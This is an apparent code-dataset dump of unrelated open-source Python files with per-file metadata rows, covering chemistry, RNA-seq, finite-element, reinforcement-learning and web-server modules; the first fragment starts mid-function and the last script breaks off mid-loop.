if not is_jsonld_response(payload):
return
doc = json.loads(payload.get_data())
if oajson.is_collection(doc):
_rewrite_annbydoc_collection_ids(doc)
else:
_rewrite_annbydoc_item_id(doc)
payload.set_data(dump_json(doc))
|
mit
| 7,361,483,527,524,593,000
| 36.805085
| 80
| 0.661063
| false
| 3.793367
| false
| false
| false
|
thesgc/chembiohub_ws
|
chembl_business_model/models/mechanismAnnotation.py
|
1
|
1567
|
__author__ = 'mnowotka'
import chembl_core_model.models as core
#-----------------------------------------------------------------------------------------------------------------------
class PredictedBindingDomains(core.PredictedBindingDomains):
#api_exclude = []
class Meta:
proxy = True
app_label = 'chembl_business_model'
#-----------------------------------------------------------------------------------------------------------------------
class LigandEff(core.LigandEff):
#haystack_index = ['bei', 'sei']
api_exclude = []
class Meta:
proxy = True
app_label = 'chembl_business_model'
#-----------------------------------------------------------------------------------------------------------------------
class ActionType(core.ActionType):
api_exclude = []
class Meta:
proxy = True
app_label = 'chembl_business_model'
#-----------------------------------------------------------------------------------------------------------------------
class DrugMechanism(core.DrugMechanism):
api_exclude = []
class Meta:
proxy = True
app_label = 'chembl_business_model'
#-----------------------------------------------------------------------------------------------------------------------
class MechanismRefs(core.MechanismRefs):
api_exclude = []
class Meta:
proxy = True
app_label = 'chembl_business_model'
#-----------------------------------------------------------------------------------------------------------------------
|
gpl-3.0
| 8,144,624,463,717,007,000
| 28.584906
| 120
| 0.333121
| false
| 5.556738
| false
| false
| false
|
mathiasmch/Krypton
|
lib/basisset.py
|
1
|
4258
|
#! /usr/bin/env python3.4
# -*- coding:utf-8 -*-
#
# Krypton - A little tool for GAMESS (US) users
#
# Copyright (C) 2012-20.. Mathias M.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from os import listdir, path, makedirs
from lib.config import *
from lib.parser import extract_basis_set, extract_ECPs
################################################################################
def add_basis_set(bsid, basis_set_file):
"""
Add the basis set of a basis set file from the BSE portal into the folder
used as database.
bsid : ID to use for the basis set (STO-3G, 6-31G, etc.)
basis_set_file : GAMESS (US) input file from the BSE portal
"""
basis_set = extract_basis_set(basis_set_file)
ECPs = extract_ECPs(basis_set_file)
elements = list()
if bsid in listdir(DB):
elements = get_elements(bsid)
else:
makedirs(DB+"/"+bsid)
for element, coeffs in basis_set.items():
if element not in elements:
with open(DB+"/"+bsid+"/"+element+".txt", "w") as f:
for coeff in coeffs:
f.write(coeff+"\n")
if ECPs:
if "ECP" not in listdir(DB+"/"+bsid):
makedirs(DB+"/"+bsid+"/ECP")
elements = get_elements(bsid, True)
for element, coeffs in ECPs.items():
if element not in elements:
with open(DB+"/"+bsid+"/ECP/"+element+".txt", "w") as f:
for coeff in coeffs:
f.write(coeff+"\n")
################################################################################
def load_basis_set(bsid):
"""
Extract the basis set from the database.
bsid : ID of the basis set
return : dictionary = list of strings for each atom
example: {'H':['S 3','1 3.425 0.154','2 0.623 0.535'], 'C': ...}
"""
basis_set = dict()
if not path.isdir(DB):
raise Exception("ERROR: There is no database.")
if bsid not in listdir(DB):
raise Exception("ERROR: Basis set "+bsid+" does not exist.")
for element_file in listdir(DB+"/"+bsid):
if element_file != "ECP":
element = element_file.split(".")[0]
with open(DB+"/"+bsid+"/"+element_file) as f:
basis_set[element] = []
for line in f:
basis_set[element].append(line.rstrip())
return basis_set
################################################################################
def get_elements(bsid, ECP=False):
"""
Return the elements available in the database for the basis set bsid.
bsid : ID of the basis set
return : list of elements
"""
elements = list()
if bsid not in listdir(DB):
raise Exception("ERROR: Basis set "+bsid+" does not exist.")
path = DB+"/"+bsid
if ECP:
path += "/ECP"
for element in listdir(path):
if element.endswith(".txt"):
elements.append(element.split(".")[0])
return elements
################################################################################
def list_basis_sets():
"""
Print the available basis sets in the database and their atoms.
"""
if not path.isdir(DB):
raise Exception("ERROR: There is no database.")
for bsid in listdir(DB):
line = bsid + " : "
for elements in get_elements(bsid):
line += elements
line += " "
if "ECP" in listdir(DB+"/"+bsid):
line += "(ECP :"
ECPs = get_elements(bsid, True)
for ECP in ECPs:
line += " "
line += ECP
line += ")"
print(line)
|
gpl-3.0
| 104,122,611,344,023,140
| 28.365517
| 80
| 0.536637
| false
| 3.990628
| false
| false
| false
|
reinforceio/tensorforce
|
tensorforce/core/parameters/exponential.py
|
1
|
2429
|
# Copyright 2020 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import tensorflow as tf
from tensorforce import TensorforceError
from tensorforce.core import tf_util
from tensorforce.core.parameters import Decaying
class Exponential(Decaying):
"""
Exponentially decaying hyperparameter (specification key: `exponential`).
Args:
unit ("timesteps" | "episodes" | "updates"): Unit of decay schedule
(<span style="color:#C00000"><b>required</b></span>).
num_steps (int): Number of decay steps
(<span style="color:#C00000"><b>required</b></span>).
initial_value (float): Initial value
(<span style="color:#C00000"><b>required</b></span>).
decay_rate (float): Decay rate
(<span style="color:#C00000"><b>required</b></span>).
staircase (bool): Whether to apply decay in a discrete staircase, as opposed to continuous,
fashion (<span style="color:#00C000"><b>default</b></span>: false).
name (string): <span style="color:#0000C0"><b>internal use</b></span>.
dtype (type): <span style="color:#0000C0"><b>internal use</b></span>.
min_value (dtype-compatible value): <span style="color:#0000C0"><b>internal use</b></span>.
max_value (dtype-compatible value): <span style="color:#0000C0"><b>internal use</b></span>.
"""
def __init__(
self, *, unit, num_steps, initial_value, decay_rate, staircase=False, name=None, dtype=None,
min_value=None, max_value=None, **kwargs
):
super().__init__(
decay='exponential', unit=unit, num_steps=num_steps, initial_value=initial_value,
name=name, dtype=dtype, min_value=min_value, max_value=max_value, decay_rate=decay_rate,
staircase=staircase, **kwargs
)
|
apache-2.0
| -670,260,956,132,704,100
| 45.711538
| 100
| 0.641005
| false
| 3.943182
| false
| false
| false
|
sdgdsffdsfff/jumpserver
|
apps/assets/serializers/node.py
|
1
|
1482
|
# -*- coding: utf-8 -*-
from rest_framework import serializers
from django.utils.translation import ugettext as _
from orgs.mixins.serializers import BulkOrgResourceModelSerializer
from ..models import Asset, Node
__all__ = [
'NodeSerializer', "NodeAddChildrenSerializer",
"NodeAssetsSerializer",
]
class NodeSerializer(BulkOrgResourceModelSerializer):
name = serializers.ReadOnlyField(source='value')
value = serializers.CharField(
required=False, allow_blank=True, allow_null=True, label=_("value")
)
class Meta:
model = Node
only_fields = ['id', 'key', 'value', 'org_id']
fields = only_fields + ['name', 'full_value']
read_only_fields = ['key', 'org_id']
def validate_value(self, data):
if self.instance:
instance = self.instance
siblings = instance.get_siblings()
else:
instance = Node.org_root()
siblings = instance.get_children()
if siblings.filter(value=data):
raise serializers.ValidationError(
_('The same level node name cannot be the same')
)
return data
class NodeAssetsSerializer(BulkOrgResourceModelSerializer):
assets = serializers.PrimaryKeyRelatedField(
many=True, queryset=Asset.objects
)
class Meta:
model = Node
fields = ['assets']
class NodeAddChildrenSerializer(serializers.Serializer):
nodes = serializers.ListField()
|
gpl-2.0
| -4,152,244,283,092,600,300
| 26.962264
| 75
| 0.644399
| false
| 4.295652
| false
| false
| false
|
SINGROUP/pycp2k
|
pycp2k/classes/_restart_averages1.py
|
1
|
1738
|
from pycp2k.inputsection import InputSection
class _restart_averages1(InputSection):
def __init__(self):
InputSection.__init__(self)
self.Itimes_start = None
self.Avecpu = None
self.Avehugoniot = None
self.Avetemp_baro = None
self.Avepot = None
self.Avekin = None
self.Avetemp = None
self.Avekin_qm = None
self.Avetemp_qm = None
self.Avevol = None
self.Avecell_a = None
self.Avecell_b = None
self.Avecell_c = None
self.Avealpha = None
self.Avebeta = None
self.Avegamma = None
self.Ave_econs = None
self.Ave_press = None
self.Ave_pxx = None
self.Ave_pv_vir = None
self.Ave_pv_tot = None
self.Ave_pv_kin = None
self.Ave_pv_cnstr = None
self.Ave_pv_xc = None
self.Ave_pv_fock_4c = None
self.Ave_colvars = None
self.Ave_mmatrix = None
self._name = "RESTART_AVERAGES"
self._keywords = {'Avehugoniot': 'AVEHUGONIOT', 'Ave_pv_kin': 'AVE_PV_KIN', 'Avepot': 'AVEPOT', 'Ave_pv_cnstr': 'AVE_PV_CNSTR', 'Avetemp_baro': 'AVETEMP_BARO', 'Avekin': 'AVEKIN', 'Ave_pv_xc': 'AVE_PV_XC', 'Avebeta': 'AVEBETA', 'Avealpha': 'AVEALPHA', 'Ave_pxx': 'AVE_PXX', 'Ave_press': 'AVE_PRESS', 'Ave_econs': 'AVE_ECONS', 'Ave_pv_fock_4c': 'AVE_PV_FOCK_4C', 'Ave_colvars': 'AVE_COLVARS', 'Ave_mmatrix': 'AVE_MMATRIX', 'Ave_pv_vir': 'AVE_PV_VIR', 'Avecell_c': 'AVECELL_C', 'Avegamma': 'AVEGAMMA', 'Avecell_a': 'AVECELL_A', 'Avekin_qm': 'AVEKIN_QM', 'Avevol': 'AVEVOL', 'Avecell_b': 'AVECELL_B', 'Itimes_start': 'ITIMES_START', 'Avetemp': 'AVETEMP', 'Avecpu': 'AVECPU', 'Avetemp_qm': 'AVETEMP_QM', 'Ave_pv_tot': 'AVE_PV_TOT'}
|
lgpl-3.0
| 1,865,731,093,727,188,500
| 47.277778
| 735
| 0.587457
| false
| 2.544656
| false
| false
| false
|
saullocastro/pyNastran
|
pyNastran/bdf/dev_vectorized/cards/loads/static/grav.py
|
1
|
4585
|
from six.moves import zip
import numpy as np
from numpy import zeros, unique
from pyNastran.bdf.field_writer_8 import print_card_8
from pyNastran.bdf.field_writer_16 import print_card_16
from pyNastran.bdf.bdf_interface.assign_type import (integer, integer_or_blank,
double, double_or_blank)
from pyNastran.bdf.dev_vectorized.cards.loads.vectorized_load import VectorizedLoad
class GRAV(VectorizedLoad):
"""
+------+-----+-----+------+-----+-----+------+-----+
| GRAV | SID | CID | A | N1 | N2 | N3 | MB |
+------+-----+-----+------+-----+-----+------+-----+
| GRAV | 1 | 3 | 32.2 | 0.0 | 0.0 | -1.0 | |
+------+-----+-----+------+-----+-----+------+-----+
"""
type = 'GRAV'
def __init__(self, model):
"""
Defines the GRAV object.
Parameters
----------
model : BDF
the BDF object
.. todo:: collapse loads
"""
VectorizedLoad.__init__(self, model)
#self.model = model
#self.n = 0
#self._cards = []
#self._comments = []
def __getitem__(self, i):
#unique_lid = unique(self.load_id)
if len(i):
f = GRAV(self.model)
f.load_id = self.load_id[i]
f.coord_id = self.coord_id[i]
f.scale = self.scale[i]
f.N = self.N[i]
f.mb = self.mb[i]
f.n = len(i)
return f
raise RuntimeError('len(i) = 0')
def __mul__(self, value):
f = GRAV(self.model)
f.load_id = self.load_id
f.coord_id = self.coord_id
f.scale = self.scale * value
f.N = self.N
f.mb = self.mb
f.n = self.n
return f
def __rmul__(self, value):
return self.__mul__(value)
def allocate(self, card_count):
ncards = card_count[self.type]
if ncards:
self.n = ncards
float_fmt = self.model.float_fmt
#: Set identification number
self.load_id = zeros(ncards, 'int32')
#: Coordinate system identification number.
self.coord_id = zeros(ncards, 'int32')
#: scale factor
self.scale = zeros(ncards, float_fmt)
self.N = zeros((ncards, 3), float_fmt)
self.mb = zeros(ncards, 'int32')
def add_card(self, card, comment=''):
#self._cards.append(card)
#self._comments.append(comment)
i = self.i
self.load_id[i] = integer(card, 1, 'sid')
#self.node_id[i] = integer(card, 1, 'node_id')
self.coord_id[i] = integer_or_blank(card, 2, 'cid', 0)
self.scale[i] = double(card, 3, 'scale')
#: Acceleration vector components measured in coordinate system CID
self.N[i, :] = [double_or_blank(card, 4, 'N1', 0.0),
double_or_blank(card, 5, 'N2', 0.0),
double_or_blank(card, 6, 'N3', 0.0)]
#: Indicates whether the CID coordinate system is defined in the
#: main Bulk Data Section (MB = -1) or the partitioned superelement
#: Bulk Data Section (MB = 0). Coordinate systems referenced in the
#: main Bulk Data Section are considered stationary with respect to
#: the assembly basic coordinate system. See Remark 10.
#: (Integer; Default = 0)
self.mb[i] = integer_or_blank(card, 7, 'mb', 0)
assert len(card) <= 8, 'len(GRAV card) = %i\ncard=%s' % (len(card), card)
self.i += 1
def build(self):
"""
Parameters
----------
:param cards: the list of GRAV cards
"""
if self.n:
i = self.load_id.argsort()
self.load_id = self.load_id[i]
#self.node_id = self.node_id[i]
self.coord_id = self.coord_id[i]
self.scale = self.scale[i]
self.N = self.N[i]
self._cards = []
self._comments = []
def get_stats(self):
msg = []
if self.n:
msg.append(' %-8s: %i' % ('GRAV', self.n))
return msg
def write_card_by_index(self, bdf_file, size=8, is_double=False, i=None):
for (lid, cid, scale, N, mb) in zip(
self.load_id[i], self.coord_id[i], self.scale[i], self.N[i, :], self.mb[i]):
card = ['GRAV', lid, cid, scale, N[0], N[1], N[2], mb]
if size == 8:
bdf_file.write(print_card_8(card))
else:
bdf_file.write(print_card_16(card))
def get_load_ids(self):
return np.unique(self.load_id)
|
lgpl-3.0
| 771,074,946,562,571,900
| 32.467153
| 89
| 0.499891
| false
| 3.363903
| false
| false
| false
|
lenarother/moderna
|
moderna/modifications/ModificationAdder.py
|
1
|
3806
|
"""
Add modifications to a residue
"""
from ResidueEditor import ResidueEditor
from BaseExchanger import BaseExchanger
from ModificationRemover import ModificationRemover
from moderna.util.Errors import AddModificationError
from moderna.util.LogFile import log
from moderna.Constants import ANY_RESIDUE, MISSING_RESIDUE, \
UNKNOWN_RESIDUE_SHORT, B_FACTOR_ADD_MODIF, \
ADDING_MODIFICATION_RULES_PATH
def parse_modification_rules(separator=' | '):
"""
Prepares a rule for adding a modification.
Rules describe which fragments add and how to do this
to obtain a residue with given modification.
Returns dict of list of dicts with rules for adding a single fragment.
Keys in each rule dict: ['modification_name', 'original_base', 'remove',
'moved_link_atoms', 'fixed_link_atoms', 'fragment_file_name', 'pdb_abbrev']
"""
rules = {}
try:
infile = open(ADDING_MODIFICATION_RULES_PATH)
except IOError:
log.write_message('File does not exist: %s ' % ADDING_MODIFICATION_RULES_PATH)
return {}
for line in infile:
line = line.strip().split(separator)
if len(line) >= 7:
mod_name = line[0].strip()
rules.setdefault(mod_name, [])
rule = {}
rule['modification_name'] = line[0]
rule['original_base'] = line[1]
rule['remove'] = line[2]
rule['moved_link_atoms'] = line[3].split(',')
rule['fixed_link_atoms'] = line[4].split(',')
rule['fragment_file_name'] = line[5]
rule['pdb_abbrev'] = line[6]
rules[mod_name].append(rule)
return rules
MODIFICATION_RULES = parse_modification_rules()
class ModificationAdder(ResidueEditor):
def add_modification(self, resi, modification_name):
"""
Adds a modification to a residue.
It adds single fragments (add_single_fragment)
according to adding modification rules (get_modification_rules).
Arguments:
- modification name (as a long abbreviation)
"""
try:
if modification_name in [ANY_RESIDUE, MISSING_RESIDUE]:
raise AddModificationError('Residue %s: expected a modification name, instead got missing/any residue abbreviation "%s"'\
% (resi.identifier, modification_name))
else:
if resi.long_abbrev == UNKNOWN_RESIDUE_SHORT:
self.mutate_unknown_residue(resi)
if resi.modified:
rem = ModificationRemover()
rem.remove_modification(resi)
rules = MODIFICATION_RULES.get(modification_name, [])
if not rules:
raise AddModificationError('Residue %s: there is no rule for adding this modification. Check modification name "%s".' \
%(resi.identifier, modification_name))
else:
if rules[0]['original_base'] != resi.original_base:
bex = BaseExchanger()
bex.exchange_base(resi, rules[0]['original_base'])
for rule in rules:
self.add_single_fragment(resi, rule)
resi.change_name(modification_name)
self.set_bfactor(resi, B_FACTOR_ADD_MODIF)
except IOError:
raise AddModificationError('Residue %s: could not add modification.' % resi.identifier)
def add_modification(resi, long_abbrev):
"""Adds modification with given abbreviation"""
old_name = resi.long_abbrev
add = ModificationAdder()
add.add_modification(resi, long_abbrev)
log.write_message('Residue %s: modification added (%s ---> %s).' %(resi.identifier, old_name, long_abbrev))
|
gpl-3.0
| 1,377,465,879,723,447,600
| 39.063158
| 139
| 0.607199
| false
| 4.083691
| false
| false
| false
|
jessicachung/rna_seq_pipeline
|
pipeline_config.py
|
1
|
8036
|
#---------------------------------
# PIPELINE RUN
#---------------------------------
# The configuration settings to run the pipeline. These options are overwritten
# if a new setting is specified as an argument when running the pipeline.
# These settings include:
# - logDir: The directory where the batch queue scripts are stored, along with
# stdout and stderr dumps after the job is run.
# - logFile: Log file in logDir which all commands submitted are stored.
# - style: the style which the pipeline runs in. One of:
# - 'print': prints the stages which will be run to stdout,
# - 'run': runs the pipeline until the specified stages are finished, and
# - 'flowchart': outputs a flowchart of the pipeline stages specified and
# their dependencies.
# - procs: the number of python processes to run simultaneously. This
# determines the maximum parallelism of the pipeline. For distributed jobs
# it also constrains the maximum total jobs submitted to the queue at any one
# time.
# - verbosity: one of 0 (quiet), 1 (normal), 2 (chatty).
# - end: the desired tasks to be run. Rubra will also run all tasks which are
# dependencies of these tasks.
# - force: tasks which will be forced to run, regardless of timestamps.
# - rebuild: one of 'fromstart','fromend'. Whether to calculate which
# dependencies will be rerun by working back from an end task to the latest
# up-to-date task, or forward from the earliest out-of-date task. 'fromstart'
# is the most conservative and commonly used as it brings all intermediate
# tasks up to date.
# - manager: "pbs" or "slurm"
pipeline = {
"logDir": "log",
"logFile": "pipeline_commands.log",
"style": "print",
"procs": 16,
"verbose": 2,
"end": ["fastQCSummary", "voom", "edgeR", "qcSummary"],
"force": [],
"rebuild": "fromstart",
"manager": "slurm",
}
# This option specifies whether or not you are using VLSCI's Merri or Barcoo
# cluster. If True, this changes java's tmpdir to the job's tmp dir on
# /scratch ($TMPDIR) instead of using the default /tmp which has limited space.
using_merri = True
# Optional parameter governing how Ruffus determines which part of the
# pipeline is out-of-date and needs to be re-run. If set to False, Ruffus
# will work back from the end target tasks and only execute the pipeline
# after the first up-to-date tasks that it encounters.
# Warning: Use with caution! If you don't understand what this option does,
# keep this option as True.
maximal_rebuild_mode = True
#---------------------------------
# CONFIG
#---------------------------------
# Name of analysis. Changing the name will create new sub-directories for
# voom, edgeR, and cuffdiff analysis.
analysis_name = "analysis_v1"
# The directory containing *.fastq.gz read files.
raw_seq_dir = "/path_to_project/fastq_files/"
# Path to the CSV file with sample information regarding condition and
# covariates if available.
samples_csv = "/path_to_project/fastq_files/samples.csv"
# Path to the CSV file with which comparisons to make.
comparisons_csv = "/path_to_project/fastq_files/comparisons.csv"
# The output directory.
output_dir = "/path_to_project/results/"
# Sequencing platform for read group information.
platform = "Illumina"
# If the experiment is paired-end or single-end: True (PE) or False (SE).
paired_end = False
# Whether the experiment is strand specific: "yes", "no", or "reverse".
stranded = "no"
#---------------------------------
# REFERENCE FILES
#---------------------------------
# Most reference files can be obtained from the Illumina iGenomes project:
# http://cufflinks.cbcb.umd.edu/igenomes.html
# Bowtie 2 index files: *.1.bt2, *.2.bt2, *.3.bt2, *.4.bt2, *.rev.1.bt2,
# *.rev.2.bt2.
genome_ref = "/vlsci/VR0002/shared/Reference_Files/Indexed_Ref_Genomes/bowtie_Indexed/human_g1k_v37"
# Genome reference FASTA. Also needs an indexed genome (.fai) and dictionary
# (.dict) file in the same directory.
genome_ref_fa = "/vlsci/VR0002/shared/Reference_Files/Indexed_Ref_Genomes/bowtie_Indexed/human_g1k_v37.fa"
# Gene set reference file (.gtf). Recommend using the GTF file obtained from
# Ensembl as Ensembl gene IDs are used for annotation (if specified).
gene_ref = "/vlsci/VR0002/shared/Reference_Files/Indexed_Ref_Genomes/TuxedoSuite_Ref_Files/Homo_sapiens/Ensembl/GRCh37/Annotation/Genes/genes.gtf"
# Either a rRNA reference fasta (ending in .fasta or .fa) or an GATK interval
# file (ending in .list) containing rRNA intervals to calculate the rRNA
# content. Can set as False if not available.
# rrna_ref = "/vlsci/VR0002/shared/Reference_Files/rRNA/human_all_rRNA.fasta"
rrna_ref = "/vlsci/VR0002/shared/jchung/human_reference_files/human_rRNA.list"
# Optional tRNA and rRNA sequences to filter out in Cuffdiff (.gtf or .gff).
# Set as False if not provided.
cuffdiff_mask_file = False
#---------------------------------
# TRIMMOMATIC PARAMETERS
#---------------------------------
# Parameters for Trimmomatic (a tool for trimming Illumina reads).
# http://www.usadellab.org/cms/index.php?page=trimmomatic
# Path of a FASTA file containing adapter sequences used in sequencing.
adapter_seq = "/vlsci/VR0002/shared/jchung/human_reference_files/TruSeqAdapters.fa"
# The maximum mismatch count which will still allow a full match to be
# performed.
seed_mismatches = 2
# How accurate the match between the two 'adapter ligated' reads must be for
# PE palindrome read alignment.
palendrome_clip_threshold = 30
# How accurate the match between any adapter etc. sequence must be against a
# read.
simple_clip_threshold = 10
# The minimum quality needed to keep a base and the minimum length of reads to
# be kept.
extra_parameters = "LEADING:3 TRAILING:3 SLIDINGWINDOW:4:15 MINLEN:36"
# Output Trimmomatic log file
write_trimmomatic_log = True
#---------------------------------
# R PARAMETERS
#---------------------------------
# Get annotations from Ensembl BioMart. GTF file needs to use IDs from Ensembl.
# Set as False to skip annotation, else
# provide the name of the dataset that will be queried. Attributes to be
# obtained include gene symbol, chromosome name, description, and gene biotype.
# Commonly used datasets:
# human: "hsapiens_gene_ensembl"
# mouse: "mmusculus_gene_ensembl"
# rat: "rnorvegicus_gene_ensembl"
# You can list all available datasets in R by using the listDatasets fuction:
# > library(biomaRt)
# > listDatasets(useMart("ensembl"))
# The gene symbol is obtained from the attribute "hgnc_symbol" (human) or
# "mgi_symbol" (mice/rats) if available. If not, the "external_gene_id" is used
# to obtain the gene symbol. You can change this by editing the script:
# scripts/combine_and_annotate.r
annotation_dataset = "hsapiens_gene_ensembl"
#---------------------------------
# SCRIPT PATHS
#---------------------------------
# Paths to other wrapper scripts needed to run the pipeline. Make sure these
# paths are relative to the directory where you plan to run the pipeline in or
# change them to absolute paths.
html_index_script = "scripts/html_index.py"
index_script = "scripts/build_index.sh"
tophat_script = "scripts/run_tophat.sh"
merge_tophat_script = "scripts/merge_tophat.sh"
fix_tophat_unmapped_reads_script = "scripts/fix_tophat_unmapped_reads.py"
htseq_script = "scripts/run_htseq.sh"
fastqc_parse_script = "scripts/fastqc_parse.py"
qc_parse_script = "scripts/qc_parse.py"
alignment_stats_script = "scripts/alignment_stats.sh"
combine_and_annotate_script = "scripts/combine_and_annotate.R"
de_analysis_script = "scripts/de_analysis.R"
#---------------------------------
# PROGRAM PATHS
#---------------------------------
trimmomatic_path = "/usr/local/trimmomatic/0.30/trimmomatic-0.30.jar"
reorder_sam_path = "/usr/local/picard/1.69/lib/ReorderSam.jar"
mark_duplicates_path = "/usr/local/picard/1.69/lib/MarkDuplicates.jar"
rnaseqc_path = "/usr/local/rnaseqc/1.1.7/RNA-SeQC_v1.1.7.jar"
add_or_replace_read_groups_path = "/usr/local/picard/1.69/lib/AddOrReplaceReadGroups.jar"
|
mit
| -6,517,727,467,118,857,000
| 39.791878
| 146
| 0.697113
| false
| 3.297497
| false
| false
| false
|
HunterBaines/sudb
|
setup.py
|
1
|
1155
|
# Author: Hunter Baines <0x68@protonmail.com>
# Copyright: (C) 2017 Hunter Baines
# License: GNU GPL version 3
import sys
from distutils.core import setup
import sudb
FAILURE = '\033[1;31m' + 'Install cannot proceed.' + '\033[00m'
if len(sys.argv) > 1 and sys.argv[1] == 'install':
# Check python version
if sys.version_info < (3, 4):
sys.exit(FAILURE + ' Sorry, Python 3.4 or above is required.')
setup(name='sudb',
description='Sudoku debugger',
long_description=sudb.__doc__,
author=sudb.__author__,
author_email=sudb.__email__,
license=sudb.__license__,
packages=['sudb'],
scripts=['scripts/sudb'],
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: End Users/Desktop',
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
'Operating System :: MacOS',
'Operating System :: POSIX',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Games/Entertainment :: Puzzle Games'
]
)
|
gpl-3.0
| -9,102,236,818,809,176,000
| 28.615385
| 77
| 0.592208
| false
| 3.737864
| false
| true
| false
|
gersteinlab/AlleleDB
|
alleledb_pipeline/CombineSnpCounts.py
|
1
|
5465
|
import gc, os, sys, string, re, pdb, scipy.stats, cPickle
import Mapping2, getNewer1000GSNPAnnotations, Bowtie, binom, GetCNVAnnotations, dictmerge, utils, InBindingSite
TABLE=string.maketrans('ACGTacgt', 'TGCAtgca')
USAGE="%s mindepth snpfile readfiletmplt maptmplt bindingsites cnvfile outfile logfile ksfile"
def reverseComplement(seq):
tmp=seq[::-1]
return tmp.translate(TABLE)
def makeMappers(maptmplt):
mappers={}
cs=['chr%s' % str(c) for c in range(1,23)] + ['chrX', 'chrY', 'chrM']
for c in cs:
f=maptmplt % c
if os.path.exists(f):
mappers[c] = Mapping2.Mapping(f)
return mappers
THRESH1=0.90
THRESH2=0.05
SYMMETRIC="Sym"
ASYMMETRIC="Asym"
HOMOZYGOUS="Homo"
WEIRD="Weird"
tbl={
'a':('a','a'),
'c':('c','c'),
'g':('g','g'),
't':('t','t'),
'r':('a','g'),
'y':('c','t'),
's':('c','g'),
'w':('a','t'),
'k':('g','t'),
'm':('a','c')
}
def convert(a):
return tbl[a.lower()]
def testCounts(counts, chrm, snprec):
winningParent='?'
ref_pos, mat_genotype, pat_genotype, child_genotype, mat_allele, pat_allele, typ, ref, hetSNP = snprec
# first, make sure that the expected alleles are the bulk of the counts
total = counts['a']+counts['c']+counts['g']+counts['t']
a1,a2=convert(child_genotype)
if a1==a2:
allelecnts = counts[a1]
else:
allelecnts = counts[a1]+counts[a2]
both=counts[a1]+counts[a2]
sortedCounts=sorted([(counts['a'], 'a'), (counts['c'],'c'), (counts['g'], 'g'), (counts['t'], 't')], reverse=True)
majorAllele=sortedCounts[0][1]
smaller=min(counts[a1], counts[a2])
#pval=binomialDist.cdf(smaller, both, 0.5)*2 # This had problems for large sample sizes. Switched to using scipy
pval = binom.binomtest(smaller, both, 0.5) # scipy.binom_test was unstable for large counts
if float(allelecnts)/total < THRESH1:
print >>LOGFP, "WARNING %s:%d failed thresh 1 %d %d" % (chrm, ref_pos, allelecnts, total)
return (WEIRD, pval, a1, a2, counts, winningParent)
# if the snp was phased
if mat_allele and pat_allele:
if mat_allele.lower()==majorAllele.lower():
winningParent='M'
elif pat_allele.lower()==majorAllele.lower():
winningParent='P'
else:
winningParent='?'
if a1!=a2:
# we expect roughly 50/50.
if pval < THRESH2:
print >>LOGFP, "NOTE %s:%d Looks interesting: failed thresh 2 %d %d %f" % (chrm, ref_pos, both, smaller, pval)
print >>LOGFP, "SNPS %s/%s, COUNTS a:%d c:%d g:%d t:%d" % (a1, a2, counts['a'], counts['c'], counts['g'], counts['t'])
print >>LOGFP, "Phasing P:%s M:%s D:%s" % (pat_allele, mat_allele, snprec)
print >>LOGFP, "\n"
return (ASYMMETRIC, pval, a1, a2, counts, winningParent)
else:
return (SYMMETRIC, pval, a1, a2, counts, winningParent)
else:
return (HOMOZYGOUS, pval, a1, a2, counts, winningParent)
def process(chrm, snppos, counts, snprec, CNVhandler):
ref_pos, mat_genotype, pat_genotype, child_genotype, mat_allele, pat_allele, typ, ref, hetSNP = snprec
t, pval, a1, a2, counts, winningParent = testCounts(counts, chrm, snprec)
#if t==ASYMMETRIC or t==SYMMETRIC:
# hetSnps+=1
#if t==ASYMMETRIC:
# interestingSnps+=1
if BShandler:
inBS=1 if BShandler.check("chr%s"%chrm, snppos) else 0
else:
inBS=-1
cnv=CNVhandler.getAnnotation("chr%s"%chrm, snppos)
if cnv:
cnv=cnv[2]
else:
cnv='1.0'
#nd, np = scipy.stats.kstest(ksvals, 'uniform', (0.0, 1.0))
print >>OUTFP, utils.myFormat('\t', (chrm, snppos, ref, mat_genotype, pat_genotype, child_genotype, typ, mat_allele, pat_allele, counts['a'], counts['c'], counts['g'], counts['t'], winningParent, t, pval, inBS, cnv))
OUTFP.flush()
# This is used to order the chromosomes 1,2,3,...,22,X,Y. Tricky, eh?
def chrcmp(a, b):
try:
a=int(a)
except:
pass
try:
b=int(b)
except:
pass
return cmp(a,b)
if __name__=='__main__':
if len(sys.argv) < 7:
print USAGE % sys.argv[0]
sys.exit(-1)
mindepth=int(sys.argv[1])
snpfile=sys.argv[2]
BindingSitefile=sys.argv[3]
CNVFile=sys.argv[4]
OUTFP = open(sys.argv[5], 'w')
LOGFP = open(sys.argv[6], 'w')
countfiles=sys.argv[7:]
if os.access(BindingSitefile, os.R_OK):
BShandler=InBindingSite.BSHandler(BindingSitefile)
else:
BShandler=None
CNVhandler=GetCNVAnnotations.Handler(CNVFile)
hetSnps=0
interestingSnps=0
gc.disable()
pat=re.compile('chr(\w+)_([mp]aternal)')
print >>OUTFP, utils.myFormat('\t', ['chrm', 'snppos ', 'ref', 'mat_gtyp', 'pat_gtyp', 'c_gtyp', 'phase', 'mat_all', 'pat_all', 'cA', 'cC', 'cG', 'cT', 'winning', 'SymCls', 'SymPval', 'BindingSite', 'cnv'])
ref_1000G=getNewer1000GSNPAnnotations.Handler(snpfile, None, 'PAT', hasHeader=True, onlyHets=True)
counts={}
for countfile in countfiles:
temp=cPickle.load(open(countfile))
dictmerge.accum(counts, temp, lambda : 0, lambda a, b: a+b)
for chrm in sorted(counts.keys(), chrcmp):
for pos in sorted(counts[chrm].keys()):
total = sum(counts[chrm][pos].values())
if total >= mindepth:
